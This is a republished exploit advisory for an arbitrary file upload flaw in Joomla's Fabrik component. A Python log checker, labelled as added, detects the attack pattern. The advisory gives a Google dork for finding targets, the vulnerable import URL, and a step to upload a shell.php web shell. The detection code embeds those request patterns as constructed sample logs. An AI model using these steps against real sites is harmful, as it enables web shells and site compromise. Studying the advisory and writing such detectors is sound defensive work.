F3D4İ's Joomla Arbitrary File Upload Vulnerability

Published: 2017.01.08
Credit: F3D4İ
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:viewtable?cid= site:it

# Exploit Title : F3D4İ's Joomla Arbitrary File Upload Vulnerability
# Google Dork : inurl:viewtable?cid= site:it
# Tested On : [ Windows- Linux ]
# Date: 07.01.2017
# Exploit Author: F3D4İ
#Author Details:twitter.com/f3d4i6
#Tested on: Kali Linux 2.0 / Windows 7-8-10
#Youtube Link : https://youtu.be/TFEVrNYuJBk
######################
# [+] DESCRIPTION :
######################
# 1:Search Google Dork and Choose a Target
# 2: exploit:
/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
# 3: upload shell.php or index.html
# 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
------------------------------------------------
This exploit works on all Joomla versions, but on websites of the Italian kind.
#demo:


#Br0thers: By B0zoklu - Tmk - Kara Murat -Trajedi - DArkSide - DarkDemon - E.C - M4ni4c - M4DD3
#We are Turkish Hackers
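
Added example (not part of the original advisory and not the author's code): a log check a site owner can run to spot the request pattern described in steps 2 to 4, a POST to the Fabrik import view followed by the same client fetching a file directly under /media/. The log lines are constructed samples in combined log format; the function name, regexes and extension list are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jan/2017:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5120
198.51.100.9 - - [07/Jan/2017:10:02:10 +0000] "POST /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 HTTP/1.1" 200 812
198.51.100.9 - - [07/Jan/2017:10:02:31 +0000] "GET /media/shell.php HTTP/1.1" 200 64
203.0.113.7 - - [07/Jan/2017:10:03:00 +0000] "GET /media/system/js/core.js HTTP/1.1" 200 2048
192.0.2.44 - - [07/Jan/2017:10:04:00 +0000] "GET /media/index.html HTTP/1.1" 200 31
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A file sitting directly in a media/ directory (no subfolder), as in the PoC paths.
# The extension list is an assumption; extend it to whatever the web server executes.
DROPPED_RE = re.compile(r'/media/[^/]+\.(?:php\d?|phtml|html?)$', re.I)


def find_upload_activity(log_text):
    """Return (import_posts, follow_ups).

    import_posts: POSTs to the com_fabrik import view.
    follow_ups:   later requests from the same client for a file directly in media/.
    """
    import_posts, follow_ups, uploaders = [], [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        q = parse_qs(url.query)
        if (method == "POST" and q.get("option") == ["com_fabrik"]
                and "import" in q.get("view", []) + q.get("c", [])):
            import_posts.append((ip, ts, target))
            uploaders.add(ip)
        elif ip in uploaders and DROPPED_RE.search(url.path):
            # Correlating on client IP keeps ordinary /media/ hits out of the result.
            follow_ups.append((ip, ts, url.path, int(status)))
    return import_posts, follow_ups


if __name__ == "__main__":
    posts, hits = find_upload_activity(SAMPLE_LOG)
    for row in posts + hits:
        print(row)
```

A follow-up request answered with status 200 means the file exists on disk; review the media/ directory for files that are not part of the installation and make sure the web server does not execute scripts from it.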



Copyright 2017, cxsecurity.com